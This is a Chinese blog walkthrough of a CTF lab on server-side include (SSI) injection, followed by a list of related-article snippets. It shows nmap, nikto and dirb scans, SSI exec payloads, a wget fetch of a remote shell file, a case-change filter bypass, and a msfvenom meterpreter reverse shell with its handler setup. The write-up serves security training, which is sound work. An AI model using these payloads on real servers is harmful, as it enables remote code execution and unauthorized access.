CTF实验:SSI注入

最新推荐文章于 2023-10-09 16:32:47 发布
最新推荐文章于 2023-10-09 16:32:47 发布
阅读量485 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/floyd_art/article/details/105306563
版权

SSI注入攻击介绍

SSI(server side inject)的出现是为了赋予html静态页面动态的效果,通过SSI来执行系统命令,并返回对应的结果。  
  如果在网站目录中发现了 .stm, .shtm .shtml,并且网站对于SSL的输入没有做到严格过滤,很有可能被SSI注入攻击。

信息探测

扫描主机服务信息以及服务版本
– nmap -sV 靶场IP地址
快速扫描主机全部信息
– nmap -T4 –A -v 靶场IP地址
探测敏感信息
– nikto -host http://靶场IP地址:端口
dirb HTTP://IP:端口
只开了http服务
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
找到敏感页面,打开
将文件下载下来
在这里插入图片描述
可以查看文件的内容

在这里插入图片描述

在这里插入图片描述
可能是提示记下来
在这里插入图片描述

漏洞利用

根据提示来利用对应SSL注入漏洞
列举当前目录中的文件和目录
《!–#exec cmd=“ls” -->
切换到指定目录
《!–#exec cmd=“cd /root/dir/”>
下载shell脚本 并重命名为shell.php
《!–#exec cmd=“wget http://ip/shell.txt | rename shell.txt shell.php” -->

尝试输入一些命令
在这里插入图片描述
返回结果
可以看到Target里<被注释了,Feedback里exec被注释了,将其改为大写再试试,成功了在这里插入图片描述

制作webshell

msfvenom -p python/meterpreter/reverse_tcp lhoost=ip lport=4444 -f raw > shell.py

启动msfconsole在这里插入图片描述
设置参数
msf > use exploit/multi/handler
msf exploit(handler) > set payload python/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
在这里插入图片描述

上传shell反弹shell

要shell.py 放在var/www/html 里 并开启apache2服务
在这里插入图片描述
准被上传
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
成功进入
sysinfo 查看系统信息
shell 进入系统shell
优化终端 python –c ‘import pty;pty.spawn(“/bin/bash”)’
在这里插入图片描述
在这里插入图片描述

总结

在CTF比赛中,对于SSI漏洞服务器具有很多过滤机制,我们需要对其进行绕过,比如大小写;

floyd_art
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF之Web安全SSI注入
小司机的奥拓
08-10 273
如何从外部进入主机?SSI(server side inject)的出现是为了赋予HTML静态页面动态的效果,通过SSI来执行系统命令;并返回对应的结果。如果再网站目录中发现了.stm;.shtm;.shtml;这样的文件后缀名,并且网站对于SSI的输入没有做到严格过滤或者过滤不充分;很有可能被SSI注入攻击。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
SSI注入
发哥微课堂
06-28 905
0x00:介绍 SSI 是 Server Side Includes 的缩写,即服务端包含。我们都知道像后台语言 php、asp 等都有文件包含的函数 include,包含一些公共的函数库等。那么 html 也有这种包含的机制,我们可以把它叫做 SSISSI 还有一些使用情况例如,页面需要动态加入一些内容,这些内容常见的比如自己的 ip 地址,自己的位置信息等。SSI 默认的文件类型是 sht...
【WEB攻防】Apache SSI 远程命令执行漏洞 复现和防御方法
AAAAAAAAAAAA66的博客
12-23 816
中华人民共和国网络安全法(出版物)_360百科中华人民共和国网络安全法,《中华人民共和国网络安全法》是为保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息化健康发展而制定的法律。《中华人民共和国网络安全法》由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,自2017年6月1日起施行。https://baike.so.com/doc/24210940-24838928.html 目录 中华人民共和国网络安全
ssti注入及绕过,ssti靶场过关
2202_75361164的博客
10-09 284
普通的cookie并不安全,可以通过客户端修改在Tornado框架中,cookie_secret是一个密钥,一般使用随机生成的字符串,被用于对生成的cookie进行加密。它的作用是确保cookie的安全性,防止被修改或伪造。具体来说,当Tornado应用程序使用set_secure_cookie()函数设置cookie时,会使用cookie_secret对cookie进行加密。而在获取cookie时,Tornado则会使用同样的密钥进行解密,并验证cookie是否被篡改。
CTF神器:自动爆破PNG图片宽高并一键修复工具
最新发布
12-29
ctf web解题 找flag夺旗赛
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
CTF赛题:将txt文件提取转换为图片(二维码)
10-20
提取txt文档中的大量0和1,生成二维码
CTF撰写:CTF挑战的撰写
02-11
CTF撰写 CTF挑战文章
De1CTF2020:De1CTF2020
02-18
ctftime xctftime 电报
BoringSSLKeys:抓住libboringssl密钥以解密流量(pcaps)
04-16
无聊的SSL密钥 允许使用的SSL_CTX_set_keylog_callback在苹果版libboringssl的 记录到控制台和缓存的文件 CLIENT_RANDOM CLIENT_HANDSHAKE_TRAFFIC_SECRET SERVER_HANDSHAKE_TRAFFIC_SECRET CLIENT_TRAFFIC_SECRET_0 SERVER_TRAFFIC_SECRET_0 EXPORTER_SECRET 必需的 iOS 13.3.1 使用Mobile Substrate越狱 建议的 rvictl(连接iOS设备) tcpdump(捕获数据包) Wireshark(解密pcaps) 使用情况 rvictl -s UDID tcpdump -i rvi0 -w capture.pcap -P 运行您想要的应用 从/ /var/mobile/Contain
CTFSSI注入
afei001
02-03 407
SSI注入攻击介绍     SSI(server side inject)的出现是为了赋予html静态页面动态的效果,通过SSI注入漏洞来执行系统命令,并返回对应的结果。     如果在网站目录中发现了stm、shtm、shtml,并且网站对于ssi的输入没有做到严格过滤,很有可能被SSI注入攻击。 练习环境 攻击机:kali 靶机:Ubuntu 16.04.3 1. 发现靶机,并对端口进...
CTF练习:HTTP服务之SSI漏洞
qq_43233085的博客
11-29 556
CTF练习:SQL注入SSI漏洞环境准备信息收集制作与上传shell进入靶机 靶机地址: 链接: https://pan.baidu.com/s/1tKoRIRNhEJzcjGwpNwP-sA 提取码: emfn 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75.143 查看靶机的IP,为172.19.75....
CTF-SSI注入
su__xiaoyan的博客
12-25 289
SSI注入 SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于CGI,用于执行动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码
CTF夺旗训练课程
热门推荐
taozijun的博客
09-04 1万+
第一章 课程介绍与环境搭建 1-2 环境搭建 攻击机统一为kali,直接用ova文件创建靶场机器后,靶场机器要求进行登陆。 可我们并没有用户名和密码。问题是:如果我们不进行登陆,如何获得靶场机器的ip地址?从而达到联通靶场机器的目的. 这里我们使用netdiscover命令 netdiscover -r ip/子网掩码    24为24位二进制数1,就是255.255.255.0。...
CTF实战(二):SSI注入
mcc的博客
09-09 409
SSI注入 这是少数几个比较完整的靶机,因此就写一篇博客记录一下拿shell的过程 1.主机发现 nmap -sP 10.10.3.0/24 2.服务扫描 nmap -sV 10.10.3.104 nmap -T4 -A -v 10.10.3.104 3.目录扫描 dirb 10.10.3.104 nikto -h 10.10.3.104 4.zap扫描 这个好无聊,扫出了漏洞 5.SSI注入...
SSI 注入的介绍和代码防御
煜铭2011
10-07 6131
0x01 介绍 当符合下列条件时,攻击者可以在 Web 服务器上运行任意命令: A. Web 服务器已支持 SSI(服务器端包含)。 B. Web 应用程序在返回 HTML 页面时,嵌入用户输入。 C. 参数值未进行输入清理。 例如,如果脚本接收文本输入,供 Web 服务器稍后处理,下列由 SSI 命令组成的输入便会侵害服务器的安全: (会显示给
CTF-12.web安全SSI注入
woo233的博客
09-20 696
SSl(server side inject)的出现是为了赋予html静态页面动态的效果,通过ssI来执行系统命令,并返回对应的结果。如果在网站目录中发现了.stm, .shtm .shtml,并且网站对于SSI的输入没有做到严格过滤,很有可能被SSl注入攻击。实验环境攻击机: kali 192.168.1.103靶场机器: linux 192.168.1.106在ctf比赛中,对于ssi漏洞服务器具有很多过滤机制,我们需要对其进行绕过,比如大小写;
ctfhub字符型注入
09-18
对于CTF比赛中的字符型注入,一般可以通过输入一些特殊字符或者语句来实现注入。攻击者可以通过注入一些恶意的语句或者字符来获取敏感信息或者实现远程代码执行等操作。 例如,在一个搜索框中,输入以下语句: ```...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值